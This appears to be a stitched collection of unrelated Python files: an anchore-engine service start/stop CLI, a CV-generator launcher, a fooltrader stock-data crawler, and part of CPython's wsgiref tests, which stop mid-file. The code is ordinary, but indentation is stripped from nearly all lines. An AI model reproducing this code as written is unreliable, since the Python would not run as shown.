def __init__(self, thread_target, thread_args):
self.thread_target = thread_target
self.thread_args = thread_args
self.start()
def start(self):
self.thread = threading.Thread(target=self.thread_target, args=self.thread_args)
self.thread.name = self.thread_args[0]
self.thread.start()
def terminate_service(service, flush_pidfile=False):
pidfile = "/var/run/anchore/" + service + ".pid"
try:
logger.info(
"Looking for pre-existing service ({}) pid from pidfile ({})".format(
service, pidfile
)
)
thepid = None
if os.path.exists(pidfile):
with open(pidfile, "r") as FH:
thepid = int(FH.read())
if thepid:
# get some additional information about the pid to determine whether or not to run the kill operations
thepid_is_theservice = False
try:
running_pid = psutil.Process(thepid)
cmdline = running_pid.cmdline()
if pidfile in cmdline:
thepid_is_theservice = True
logger.info(
"Found existing service ({}) running with pid ({})".format(
service, thepid
)
)
else:
logger.info(
"Found pid running but belongs to unrelated process - skipping terminate"
)
except Exception as err:
thepid_is_theservice = False
if thepid_is_theservice:
try:
logger.info(
"Terminating existing service ({}) with pid ({}) using signal 0".format(
service, thepid
)
)
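                    # signal 0 does not terminate anything; it only raises OSError if the pid is gone,
                    # in which case the kill with signal 9 in the else branch is skipped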
os.kill(thepid, 0)
except OSError:
pass
else:
logger.info(
"Terminating existing service ({}) with pid ({}) using signal 9".format(
service, thepid
)
)
os.kill(thepid, 9)
if flush_pidfile:
logger.info(
"Removing stale pidfile ({}) for service ({})".format(
pidfile, service
)
)
os.remove(pidfile)
except Exception as err:
logger.info(
"Could not detect/shut down running service ({}) - exception: {}".format(
service, str(err)
)
)
def startup_service(service, configdir):
pidfile = "/var/run/anchore/" + service + ".pid"
logfile = "/var/log/anchore/" + service + ".log"
# os.environ['ANCHORE_LOGFILE'] = logfile
logger.info("cleaning up service: {}".format(str(service)))
terminate_service(service, flush_pidfile=True)
twistd_cmd = "twistd"
for f in ["/bin/twistd", "/usr/local/bin/twistd"]:
if os.path.exists(f):
twistd_cmd = f
cmd = [
twistd_cmd,
"--logger=anchore_engine.subsys.twistd_logger.logger",
"--pidfile",
pidfile,
"-n",
service,
"--config",
configdir,
]
logger.info("starting service: {}".format(str(service)))
logger.info("\t {}".format(" ".join(cmd)))
try:
newenv = os.environ.copy()
newenv["ANCHORE_LOGFILE"] = logfile
pipes = subprocess.Popen(cmd, env=newenv)
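        # twistd runs in the foreground (-n), so communicate() blocks until the service process exits;
        # reaching the raise below therefore always means the service has died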
sout, serr = pipes.communicate()
rc = pipes.returncode
raise Exception("process exited: " + str(rc))
except Exception as err:
logger.exception(
"service process exited at ({}): {}".format(str(time.ctime()), str(err))
)
logger.fatal("Could not start service due to: {}".format(str(err)))
logger.info("exiting service thread")
return False
config = {}
module = None
@click.group(name="service", short_help="Service operations")
@click.pass_obj
def service(ctx_config):
global config, module
config = ctx_config
@service.command(name="list", short_help="List valid service names")
@click.option(
"--anchore-module", help="Module to list services for", default="anchore_engine"
)
def do_list(anchore_module):
click.echo("Locally installed and available service types:")
from anchore_engine.service import BaseService
# Expects a services module within the base module
importlib.import_module(anchore_module + ".services")
for name in BaseService.registry.keys():
click.echo(name)
doexit(ExitCode.ok)
return
@service.command(name="start", short_help="Start anchore-engine")
@click.argument("services", nargs=-1)
@click.option(
"--no-auto-upgrade",
is_flag=True,
default=False,
help="Do not perform automatic upgrade on startup",
)
@click.option(
"--anchore-module",
nargs=1,
help="Name of anchore module to call DB routines from (default=anchore_engine)",
)
@click.option(
"--skip-config-validate",
nargs=1,
help="Comma-separated list of configuration file sections to skip specific validation processing (e.g. services,credentials,webhooks)",
)
@click.option(
"--skip-db-compat-check",
is_flag=True,
help="Skip the database compatibility check.",
)
@click.option("--all", is_flag=True, default=False)
def start(
services,
no_auto_upgrade,
anchore_module,
skip_config_validate,
skip_db_compat_check,
all,
):
"""
Startup and monitor service processes. Specify a list of service names or empty for all.
"""
global config
ecode = ExitCode.ok
if not anchore_module:
module_name = "anchore_engine"
else:
module_name = str(anchore_module)
if os.environ.get(
"ANCHORE_ENGINE_SKIP_DB_COMPAT_CHECK", str(skip_db_compat_check)
).lower() in ["true", "t", "y", "yes"]:
skip_db_compat_check = True
else:
skip_db_compat_check = False
if services:
input_services = list(services)
else:
input_services = os.getenv("ANCHORE_ENGINE_SERVICES", "").strip().split()
if not input_services and not all:
raise click.exceptions.BadArgumentUsage(
"No services defined to start. Must either provide service arguments, ANCHORE_ENGINE_SERVICES env var, or --all option"
)
try:
validate_params = {"services": True, "webhooks": True, "credentials": True}
if skip_config_validate:
try:
items = skip_config_validate.split(",")
for item in items:
validate_params[item] = False
except Exception as err:
raise Exception(err)
# find/set up configuration
configdir = config["configdir"]
configfile = os.path.join(configdir, "config.yaml")
localconfig = None
if os.path.exists(configfile):
try:
localconfig = anchore_engine.configuration.localconfig.load_config(
configdir=configdir,
configfile=configfile,
validate_params=validate_params,
)
except Exception as err:
raise Exception("cannot load local configuration: " + str(err))
else:
raise Exception("cannot locate configuration file ({})".format(configfile))
# load the appropriate DB module
try:
logger.info("Loading DB routines from module ({})".format(module_name))
module = importlib.import_module(module_name + ".db.entities.upgrade")
except Exception as err:
raise Exception(
"Input anchore-module ("
+ str(module_name)
+ ") cannot be found/imported - exception: "
+ str(err)
)
# get the list of local services to start
startFailed = False
if not input_services:
config_services = localconfig.get("services", {})
if not config_services:
logger.warn("could not find any services to execute in the config file")
sys.exit(1)
input_services = [
name
for name, srv_conf in list(config_services.items())
if srv_conf.get("enabled")
]
services = []
for service_conf_name in input_services:
if service_conf_name in list(service_map.values()):
svc = service_conf_name
else:
svc = service_map.get(service_conf_name)
if svc:
services.append(svc)
else:
logger.warn(
"specified service {} not found in list of available services {} - removing from list of services to start".format(
service_conf_name, list(service_map.keys())
)
)
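        # start anchore-catalog first (the other services are assumed to depend on it being up)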
if "anchore-catalog" in services:
services.remove("anchore-catalog")
services.insert(0, "anchore-catalog")
if not services:
logger.error(
"No services found in ANCHORE_ENGINE_SERVICES or as enabled in config.yaml to start - exiting"
)
sys.exit(1)
# preflight - db checks
try:
db_params = anchore_engine.db.entities.common.get_params(localconfig)
# override db_timeout since upgrade might require longer db session timeout setting
try:
if "timeout" in db_params.get("db_connect_args", {}):
db_params["db_connect_args"]["timeout"] = 86400
elif "connect_timeout" in db_params.get("db_connect_args", {}):
db_params["db_connect_args"]["connect_timeout"] = 86400
except Exception as err:
pass
anchore_manager.util.db.connect_database(db_params, db_retries=300)
code_versions, db_versions = anchore_manager.util.db.init_database(
upgrade_module=module,
localconfig=localconfig,
do_db_compatibility_check=(not skip_db_compat_check),
)
in_sync = False
timed_out = False
max_timeout = 3600
timer = time.time()
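            # poll until the DB schema version matches this code's version; if this node runs
            # anchore-catalog and auto-upgrade is enabled, run the upgrade instead of waiting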
while not in_sync and not timed_out:
code_versions, db_versions = module.get_versions()
if code_versions and db_versions:
if code_versions["db_version"] != db_versions["db_version"]:
if not no_auto_upgrade and "anchore-catalog" in services:
logger.info("Performing upgrade.")
try:
# perform the upgrade logic here
rc = module.run_upgrade()
if rc:
logger.info("Upgrade completed")
else:
logger.info("No upgrade necessary. Completed.")
except Exception as err:
raise err
in_sync = True
else:
logger.warn(
"this version of anchore-engine requires the anchore DB version ({}) but we discovered anchore DB version ({}) in the running DB - it is safe to run the upgrade while seeing this message - will retry for {} more seconds.".format(
str(code_versions["db_version"]),
str(db_versions["db_version"]),
str(max_timeout - int(time.time() - timer)),
)
)
time.sleep(5)
else:
logger.info("DB version and code version in sync.")
in_sync = True
else:
logger.warn(
"no existing anchore DB data can be discovered, assuming bootstrap"
)
in_sync = True
if (max_timeout - int(time.time() - timer)) < 0:
timed_out = True
if not in_sync:
raise Exception(
"this version of anchore-engine requires the anchore DB version ("
+ str(code_versions["db_version"])
+ ") but we discovered anchore DB version ("
+ str(db_versions["db_version"])
+ ") in the running DB - please perform the DB upgrade process and retry\n"
"See: https://engine.anchore.io/docs/install/upgrade/#advanced--manual-upgrade-procedure"
)
except Exception as err:
raise err
finally:
rc = anchore_engine.db.entities.common.do_disconnect()
# start up services
logger.info("Starting services: {}".format(services))
for supportdir in ["/var/log/anchore", "/var/run/anchore"]:
try:
if not os.path.exists(supportdir):
os.makedirs(supportdir, 0o755)
except Exception as err:
logger.error(
"cannot create log directory {} - exception: {}".format(
supportdir, str(err)
)
)
raise err
pids = []
keepalive_threads = []
for service in services:
pidfile = "/var/run/anchore/" + service + ".pid"
try:
terminate_service(service, flush_pidfile=True)
service_thread = ServiceThread(startup_service, (service, configdir))
keepalive_threads.append(service_thread)
max_tries = 30
tries = 0
alive = True
while not os.path.exists(pidfile) and tries < max_tries:
logger.info(
"waiting for service pidfile {} to exist {}/{}".format(
pidfile, tries, max_tries
)
)
try:
alive = service_thread.thread.is_alive()
except:
pass
if not alive:
logger.info("service thread has stopped {}".format(service))
break
time.sleep(1)
tries = tries + 1
logger.info(
"auto_restart_services setting: {}".format(
localconfig.get("auto_restart_services", False)
)
)
if not localconfig.get("auto_restart_services", False):
logger.info(
"checking for startup failure pidfile={}, is_alive={}".format(
os.path.exists(pidfile), alive
)
)
if not os.path.exists(pidfile) or not alive:
raise Exception(
"service thread for ({}) failed to start".format(service)
)
time.sleep(1)
except Exception as err:
startFailed = True
logger.warn("service start failed - exception: {}".format(str(err)))
break
if startFailed:
logger.fatal(
"one or more services failed to start. cleanly terminating the others"
)
for service in services:
terminate_service(service, flush_pidfile=True)
sys.exit(1)
else:
# start up the log watchers
try:
observer = Observer()
observer.schedule(AnchoreLogWatcher(), path="/var/log/anchore/")
observer.start()
try:
while True:
time.sleep(1)
if localconfig.get(
"auto_restart_services", False
): # 'auto_restart_services' in localconfig and localconfig['auto_restart_services']:
for service_thread in keepalive_threads:
if not service_thread.thread.is_alive():
logger.info(
"restarting service: {}".format(
service_thread.thread.name
)
)
service_thread.start()
except KeyboardInterrupt:
observer.stop()
observer.join()
except Exception as err:
logger.error(
"failed to startup log watchers - exception: {}".format(str(err))
)
raise err
except Exception as err:
log_error("servicestart", err)
ecode = ExitCode.failed
doexit(ecode)
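# Hypothetical invocation sketch (entrypoint name and service list are illustrative, not taken from this file):
#   ANCHORE_ENGINE_SERVICES="catalog simplequeue apiext" anchore-manager service start
#   anchore-manager service list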
|
cvgen.py
|
#!/usr/bin/env python3
import sys
if sys.version_info < (3, 5):
    raise Exception("This program requires Python 3.5 or newer.")
if len(sys.argv) < 2:
    raise Exception("This program requires a JSON file as its first command-line argument.")
from os.path import join, dirname, realpath
try:
from PIL import __version__
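    # collapse the last dot so the version string can be compared numerically, e.g. "5.4.1" -> 5.41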
pillow_version = float(''.join(__version__.rsplit(".", 1)))
if pillow_version < 4.2: raise ImportError
sys.path.append(join(dirname(realpath(__file__)), "top"))
sys.path.append(join(dirname(realpath(__file__)), "center"))
sys.path.append(join(dirname(realpath(__file__)), "bottom"))
from time import time, sleep
from threading import Thread
from cv import Cv
out = None
start = time()
def loader():
for c in __import__("itertools").cycle(["|", "/", "-", "\\"]):
if out: break
sys.stdout.write("\rGenerating CV... " + c)
sys.stdout.flush()
sleep(0.1)
print("\rCV successfully generated (%.2fs elapsed): %s" % (time() - start, out))
Thread(target=loader).start()
out = Cv(sys.argv[1]).generate()
except ImportError:
from subprocess import check_call
command = ' '.join([sys.executable, "-m", "pip", "install", "-r", "requirements.txt"])
print("Trying to install missing dependencies with command: %s" % command)
check_call(command.split())
command = ' '.join([sys.executable, join(dirname(realpath(__file__)), sys.argv[0]), sys.argv[1]])
print("Running the program again after installing missing dependencies: %s" % command)
check_call(command.split())
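# Hypothetical usage (the JSON file name is illustrative):
#   python3 cvgen.py cv.json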
|
datamanager.py
|
import argparse
import logging
import os
from multiprocessing import Process
import pandas as pd
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from fooltrader import settings
from fooltrader.api import event
from fooltrader.api.finance import get_balance_sheet_items, get_income_statement_items, get_cash_flow_statement_items
from fooltrader.api.quote import get_security_list, get_latest_download_trading_date, get_trading_dates, \
get_available_tick_dates, get_kdata
from fooltrader.contract.files_contract import get_balance_sheet_path, get_income_statement_path, \
get_cash_flow_statement_path
from fooltrader.settings import STOCK_START_CODE, STOCK_END_CODE, US_STOCK_CODES
from fooltrader.spiders.america.america_list_spider import AmericaListSpider
from fooltrader.spiders.america.america_stock_finance_spider import AmericaStockFinanceSpider
from fooltrader.spiders.america.america_stock_kdata_spider_163 import AmericaStockKdataSpider
from fooltrader.spiders.security_list_spider import SecurityListSpider
from fooltrader.spiders.stock.sina_category_spider import SinaCategorySpider
from fooltrader.spiders.stock.stock_summary_spider import StockSummarySpider
from fooltrader.spiders.stock_finance_report_event_spider import StockFinanceReportEventSpider
from fooltrader.spiders.stock_finance_spider import StockFinanceSpider
from fooltrader.spiders.stock_kdata_spider import StockKDataSpider
from fooltrader.spiders.stock_kdata_spider_163 import StockKdataSpider163
from fooltrader.spiders.stock_tick_spider import StockTickSpider
from fooltrader.utils.utils import get_report_date
logger = logging.getLogger(__name__)
def crawl(spider, setting):
process = CrawlerProcess({**get_project_settings(), **setting})
process.crawl(spider)
process.start()
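# Run each spider in its own short-lived process, presumably because Scrapy's Twisted reactor
# cannot be restarted within a single process; join(5 * 60) caps one crawl at five minutes.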
def process_crawl(spider, setting):
p = Process(target=crawl, args=(spider, setting))
p.start()
p.join(5 * 60)
def crawl_usa_stock_data():
# crawl the stock list
process_crawl(AmericaListSpider, {})
# crawl the kdata
for _, security_item in get_security_list(security_type='stock', exchanges=['nasdaq'],
codes=US_STOCK_CODES).iterrows():
process_crawl(AmericaStockKdataSpider, {"security_item": security_item})
# crawl the finance data
# process_crawl(AmericaStockFinanceSpider, {"security_item": security_item})
# crawl index data
# process_crawl(Sp500Spider, {})
def crawl_stock_meta():
    # refresh the stock list
    # TODO: check whether we need to detect newly listed stocks; fetching the full list once a day is good enough for now
if True:
logger.info('download stock list start')
process_crawl(SecurityListSpider, {})
logger.info('download stock list finish')
process_crawl(SinaCategorySpider, {'category_type': 'sinaIndustry'})
process_crawl(SinaCategorySpider, {'category_type': 'sinaConcept'})
process_crawl(SinaCategorySpider, {'category_type': 'sinaArea'})
def crawl_finance_data(start_code=STOCK_START_CODE, end_code=STOCK_END_CODE):
for _, security_item in get_security_list(start=start_code, end=end_code).iterrows():
try:
            # crawl the report events first, since some of the later crawls depend on them
process_crawl(StockFinanceReportEventSpider, {"security_item": security_item})
current_report_date = get_report_date()
            # balance sheet
path = get_balance_sheet_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "balance_sheet"})
else:
for balance_sheet_item in get_balance_sheet_items(security_item):
                    # the current report period has not been crawled yet
if balance_sheet_item['reportDate'] != current_report_date:
                        # the report has been published
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "balance_sheet"})
break
            # income statement
path = get_income_statement_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "income_statement"})
else:
for balance_sheet_item in get_income_statement_items(security_item):
if balance_sheet_item['reportDate'] != current_report_date:
                        # the report has been published
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "income_statement"})
break
            # cash flow statement
path = get_cash_flow_statement_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "cash_flow"})
else:
for balance_sheet_item in get_cash_flow_statement_items(security_item):
if balance_sheet_item['reportDate'] != current_report_date:
                        # the report has been published
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "cash_flow"})
break
except Exception as e:
logger.error(e)
def crawl_index_quote():
for _, security_item in get_security_list(security_type='index').iterrows():
        # crawl daily k-line (candlestick) data
logger.info("{} get index kdata start".format(security_item['code']))
start_date = get_latest_download_trading_date(security_item, source='163')
end_date = pd.Timestamp.today()
if start_date > end_date:
logger.info("{} kdata is ok".format(security_item['code']))
else:
process_crawl(StockKdataSpider163, {"security_item": security_item,
"start_date": start_date,
"end_date": end_date})
logger.info("{} get index kdata from 163 end".format(security_item['code']))
        # fetch market summary data [Shanghai, Shenzhen, SME board, ChiNext]
if security_item['id'] in ['index_sh_000001', 'index_sz_399106', 'index_sz_399005', 'index_sz_399006']:
# if security_item['id'] in ['index_sz_399106', 'index_sz_399005', 'index_sz_399006']:
df = get_kdata(security_item=security_item)
df = df[df['turnoverRate'].isna() | df['tCap'].isna() | df['mCap'].isna() | df[
'pe'].isna()]
if not df.empty:
dates = df.index.strftime('%Y-%m-%d').tolist()
# if security_item['id'] == 'index_sz_399106':
# dates = [the_date for the_date in dates if
# pd.Timestamp(the_date).date().year >= 2018]
if dates:
process_crawl(StockSummarySpider, {"security_item": security_item,
"the_dates": dates})
def crawl_stock_quote(start_code=STOCK_START_CODE, end_code=STOCK_END_CODE, crawl_tick=True):
    # crawl stock k-line data
for _, security_item in get_security_list(start=start_code, end=end_code).iterrows():
        # crawl daily k-line data
logger.info("{} get stock kdata start".format(security_item['code']))
start_date = get_latest_download_trading_date(security_item, source='163')
end_date = pd.Timestamp.today()
if start_date > end_date:
logger.info("{} stock kdata is ok".format(security_item['code']))
else:
process_crawl(StockKdataSpider163, {"security_item": security_item,
"start_date": start_date,
"end_date": end_date})
logger.info("{} get stock kdata from 163 end".format(security_item['code']))
base_dates = set(get_trading_dates(security_item, source='163'))
for fuquan in ('bfq', 'hfq'):
sina_dates = set(get_trading_dates(security_item, source='sina', fuquan=fuquan))
diff_dates = base_dates - sina_dates
if diff_dates:
logger.info("{} get {} kdata from sina start".format(security_item['code'], fuquan))
process_crawl(StockKDataSpider, {"security_item": security_item,
"trading_dates": diff_dates,
"fuquan": fuquan})
logger.info("{} get {} kdata from sina end".format(security_item['code'], fuquan))
else:
logger.info("{} {} kdata from sina is ok".format(security_item['code'], fuquan))
        # crawl tick data
if crawl_tick:
tick_dates = {x for x in base_dates if x >= settings.START_TICK_DATE}
diff_dates = tick_dates - set(get_available_tick_dates(security_item))
if diff_dates:
logger.info("{} get tick start".format(security_item['code']))
process_crawl(StockTickSpider, {"security_item": security_item,
"trading_dates": diff_dates})
logger.info("{} get tick end".format(security_item['code']))
else:
logger.info("{} tick is ok".format(security_item['code']))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--start_code', default='000778', help='the stock start code to be crawled')
parser.add_argument('-e', '--end_code', default='000778', help='the stock end code to be crawled')
args = parser.parse_args()
# crawl_stock_meta()
# crawl_index_quote()
# crawl_stock_quote(args.start_code, args.end_code)
crawl_finance_data(args.start_code, args.end_code)
# crawl_usa_stock_data()
|
test_wsgiref.py
|
from unittest import mock
from test import support
from test.test_httpservers import NoLogRequestHandler
from unittest import TestCase
from wsgiref.util import setup_testing_defaults
from wsgiref.headers import Headers
from wsgiref.handlers import BaseHandler, BaseCGIHandler, SimpleHandler
from wsgiref import util
from wsgiref.validate import validator
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
from wsgiref.simple_server import make_server
from http.client import HTTPConnection
from io import StringIO, BytesIO, BufferedReader
from socketserver import BaseServer
from platform import python_implementation
import os
import re
import signal
import sys
import threading
import unittest
class MockServer(WSGIServer):
"""Non-socket HTTP server"""
def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.server_bind()
def server_bind(self):
host, port = self.server_address
self.server_name = host
self.server_port = port
self.setup_environ()
class MockHandler(WSGIRequestHandler):
"""Non-socket HTTP handler"""
def setup(self):
self.connection = self.request
self.rfile, self.wfile = self.connection
def finish(self):
pass
def hello_app(environ,start_response):
start_response("200 OK", [
('Content-Type','text/plain'),
('Date','Mon, 05 Jun 2006 18:49:54 GMT')
])
return [b"Hello, world!"]
def header_app(environ, start_response):
start_response("200 OK", [
('Content-Type', 'text/plain'),
('Date', 'Mon, 05 Jun 2006 18:49:54 GMT')
])
return [';'.join([
environ['HTTP_X_TEST_HEADER'], environ['QUERY_STRING'],
environ['PATH_INFO']
]).encode('iso-8859-1')]
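# Drive one request through the WSGI stack entirely in memory: MockServer/MockHandler replace the
# socket with BytesIO buffers, and stderr is captured so tests can assert on logged errors.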
def run_amock(app=hello_app, data=b"GET / HTTP/1.0\n\n"):
server = make_server("", 80, app, MockServer, MockHandler)
inp = BufferedReader(BytesIO(data))
out = BytesIO()
olderr = sys.stderr
err = sys.stderr = StringIO()
try:
server.finish_request((inp, out), ("127.0.0.1",8888))
finally:
sys.stderr = olderr
return out.getvalue(), err.getvalue()
def compare_generic_iter(make_it,match):
"""Utility to compare a generic 2.1/2.2+ iterator with an iterable
If running under Python 2.2+, this tests the iterator using iter()/next(),
as well as __getitem__. 'make_it' must be a function returning a fresh
iterator to be tested (since this may test the iterator twice)."""
it = make_it()
n = 0
for item in match:
if not it[n]==item: raise AssertionError
n+=1
try:
it[n]
except IndexError:
pass
else:
raise AssertionError("Too many items from __getitem__",it)
try:
iter, StopIteration
except NameError:
pass
else:
# Only test iter mode under 2.2+
it = make_it()
if not iter(it) is it: raise AssertionError
for item in match:
if not next(it) == item: raise AssertionError
try:
next(it)
except StopIteration:
pass
else:
raise AssertionError("Too many items from .__next__()", it)
class IntegrationTests(TestCase):
def check_hello(self, out, has_length=True):
pyver = (python_implementation() + "/" +
sys.version.split()[0])
self.assertEqual(out,
("HTTP/1.0 200 OK\r\n"
"Server: WSGIServer/0.2 " + pyver +"\r\n"
"Content-Type: text/plain\r\n"
"Date: Mon, 05 Jun 2006 18:49:54 GMT\r\n" +
(has_length and "Content-Length: 13\r\n" or "") +
"\r\n"
"Hello, world!").encode("iso-8859-1")
)
def test_plain_hello(self):
out, err = run_amock()
self.check_hello(out)
def test_environ(self):
request = (
b"GET /p%61th/?query=test HTTP/1.0\n"
b"X-Test-Header: Python test \n"
b"X-Test-Header: Python test 2\n"
b"Content-Length: 0\n\n"
)
out, err = run_amock(header_app, request)
self.assertEqual(
out.splitlines()[-1],
b"Python test,Python test 2;query=test;/path/"
)
def test_request_length(self):
out, err = run_amock(data=b"GET " + (b"x" * 65537) + b" HTTP/1.0\n\n")
self.assertEqual(out.splitlines()[0],
b"HTTP/1.0 414 Request-URI Too Long")
def test_validated_hello(self):
out, err = run_amock(validator(hello_app))
# the middleware doesn't support len(), so content-length isn't there
self.check_hello(out, has_length=False)
def test_simple_validation_error(self):
def bad_app(environ,start_response):
start_response("200 OK", ('Content-Type','text/plain'))
return ["Hello, world!"]
out, err = run_amock(validator(bad_app))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(
err.splitlines()[-2],
"AssertionError: Headers (('Content-Type', 'text/plain')) must"
" be of type list: <class 'tuple'>"
)
def test_status_validation_errors(self):
def create_bad_app(status):
def bad_app(environ, start_response):
start_response(status, [("Content-Type", "text/plain; charset=utf-8")])
return [b"Hello, world!"]
return bad_app
tests = [
('200', 'AssertionError: Status must be at least 4 characters'),
('20X OK', 'AssertionError: Status message must begin w/3-digit code'),
('200OK', 'AssertionError: Status message must have a space after code'),
]
for status, exc_message in tests:
with self.subTest(status=status):
out, err = run_amock(create_bad_app(status))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(err.splitlines()[-2], exc_message)
def test_wsgi_input(self):
def bad_app(e,s):
e["wsgi.input"].read()
s("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
return [b"data"]
out, err = run_amock(validator(bad_app))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(
err.splitlines()[-2], "AssertionError"
)
def test_bytes_validation(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain; charset=utf-8"),
("Date", "Wed, 24 Dec 2008 13:29:32 GMT"),
])
return [b"data"]
out, err = run_amock(validator(app))
self.assertTrue(err.endswith('"GET / HTTP/1.0" 200 4\n'))
ver = sys.version.split()[0].encode('ascii')
py = python_implementation().encode('ascii')
pyver = py + b"/" + ver
self.assertEqual(
b"HTTP/1.0 200 OK\r\n"
b"Server: WSGIServer/0.2 "+ pyver + b"\r\n"
b"Content-Type: text/plain; charset=utf-8\r\n"
b"Date: Wed, 24 Dec 2008 13:29:32 GMT\r\n"
b"\r\n"
b"data",
out)
def test_cp1252_url(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain"),
("Date", "Wed, 24 Dec 2008 13:29:32 GMT"),
])
# PEP3333 says environ variables are decoded as latin1.
# Encode as latin1 to get original bytes
return [e["PATH_INFO"].encode("latin1")]
out, err = run_amock(
validator(app), data=b"GET /\x80%80 HTTP/1.0")
self.assertEqual(
[
b"HTTP/1.0 200 OK",
mock.ANY,
b"Content-Type: text/plain",
b"Date: Wed, 24 Dec 2008 13:29:32 GMT",
b"",
b"/\x80\x80",
],
out.splitlines())
def test_interrupted_write(self):
# BaseHandler._write() and _flush() have to write all data, even if
# it takes multiple send() calls. Test this by interrupting a send()
# call with a Unix signal.
pthread_kill = support.get_attribute(signal, "pthread_kill")
def app(environ, start_response):
start_response("200 OK", [])
return [b'\0' * support.SOCK_MAX_SIZE]
class WsgiHandler(NoLogRequestHandler, WSGIRequestHandler):
pass
server = make_server(support.HOST, 0, app, handler_class=WsgiHandler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
received = None
main_thread = threading.get_ident()
def run_client():
http = HTTPConnection(*server.server_address)
http.request("GET", "/")
with http.getresponse() as response:
response.read(100)
# The main thread should now be blocking in a send() system
# call. But in theory, it could get interrupted by other
# signals, and then retried. So keep sending the signal in a
# loop, in case an earlier signal happens to be delivered at
# an inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received
received = len(response.read())
http.close()
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(received, support.SOCK_MAX_SIZE - 100)
class UtilityTests(TestCase):
def checkShift(self,sn_in,pi_in,part,sn_out,pi_out):
env = {'SCRIPT_NAME':sn_in,'PATH_INFO':pi_in}
util.setup_testing_defaults(env)
self.assertEqual(util.shift_path_info(env),part)
self.assertEqual(env['PATH_INFO'],pi_out)
self.assertEqual(env['SCRIPT_NAME'],sn_out)
return env
def checkDefault(self, key, value, alt=None):
# Check defaulting when empty
env = {}
util.setup_testing_defaults(env)
if isinstance(value, StringIO):
self.assertIsInstance(env[key], StringIO)
elif isinstance(value,BytesIO):
self.assertIsInstance(env[key],BytesIO)
else:
self.assertEqual(env[key], value)
# Check existing value
env = {key:alt}
util.setup_testing_defaults(env)
self.assertIs(env[key], alt)
def checkCrossDefault(self,key,value,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(kw[key],value)
def checkAppURI(self,uri,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(util.application_uri(kw),uri)
def checkReqURI(self,uri,query=1,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(util.request_uri(kw,query),uri)
def checkFW(self,text,size,match):
def make_it(text=text,size=size):
return util.FileWrapper(StringIO(text),size)
compare_generic_iter(make_it,match)
it = make_it()
self.assertFalse(it.filelike.closed)
for item in it:
pass
self.assertFalse(it.filelike.closed)
it.close()
self.assertTrue(it.filelike.closed)
def testSimpleShifts(self):
self.checkShift('','/', '', '/', '')
self.checkShift('','/x', 'x', '/x', '')
self.checkShift('/','', None, '/', '')
self.checkShift('/a','/x/y', 'x', '/a/x', '/y')
self.checkShift('/a','/x/', 'x', '/a/x', '/')
def testNormalizedShifts(self):
self.checkShift('/a/b', '/../y', '..', '/a', '/y')
self.checkShift('', '/../y', '..', '', '/y')
self.checkShift('/a/b', '//y', 'y', '/a/b/y', '')
self.checkShift('/a/b', '//y/', 'y', '/a/b/y', '/')
self.checkShift('/a/b', '/./y', 'y', '/a/b/y', '')
self.checkShift('/a/b', '/./y/', 'y', '/a/b/y', '/')
self.checkShift('/a/b', '///./..//y/.//', '..', '/a', '/y/')
self.checkShift('/a/b', '///', '', '/a/b/', '')
self.checkShift('/a/b', '/.//', '', '/a/b/', '')
self.checkShift('/a/b', '/x//', 'x', '/a/b/x', '/')
self.checkShift('/a/b', '/.', None, '/a/b', '')
def testDefaults(self):
for key, value in [
('SERVER_NAME','127.0.0.1'),
('SERVER_PORT', '80'),
('SERVER_PROTOCOL','HTTP/1.0'),
('HTTP_HOST','127.0.0.1'),
('REQUEST_METHOD','GET'),
('SCRIPT_NAME',''),
('PATH_INFO','/'),
('wsgi.version', (1,0)),
('wsgi.run_once', 0),
('wsgi.multithread', 0),
('wsgi.multiprocess', 0),
('wsgi.input', BytesIO()),
('wsgi.errors', StringIO()),
('wsgi.url_scheme','http'),
]:
self.checkDefault(key,value)
def testCrossDefaults(self):
self.checkCrossDefault('HTTP_HOST',"foo.bar",SERVER_NAME="foo.bar")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="on")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="1")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="yes")
self.checkCrossDefault('wsgi.url_scheme',"http",HTTPS="foo")
self.checkCrossDefault('SERVER_PORT',"80",HTTPS="foo")
self.checkCrossDefault('SERVER_PORT',"443",HTTPS="on")
def testGuessScheme(self):
self.assertEqual(util.guess_scheme({}), "http")
self.assertEqual(util.guess_scheme({'HTTPS':"foo"}), "http")
self.assertEqual(util.guess_scheme({'HTTPS':"on"}), "https")
self.assertEqual(util.guess_scheme({'HTTPS':"yes"}), "https")
self.assertEqual(util.guess_scheme({'HTTPS':"1"}), "https")
def testAppURIs(self):
self.checkAppURI("http://127.0.0.1/")
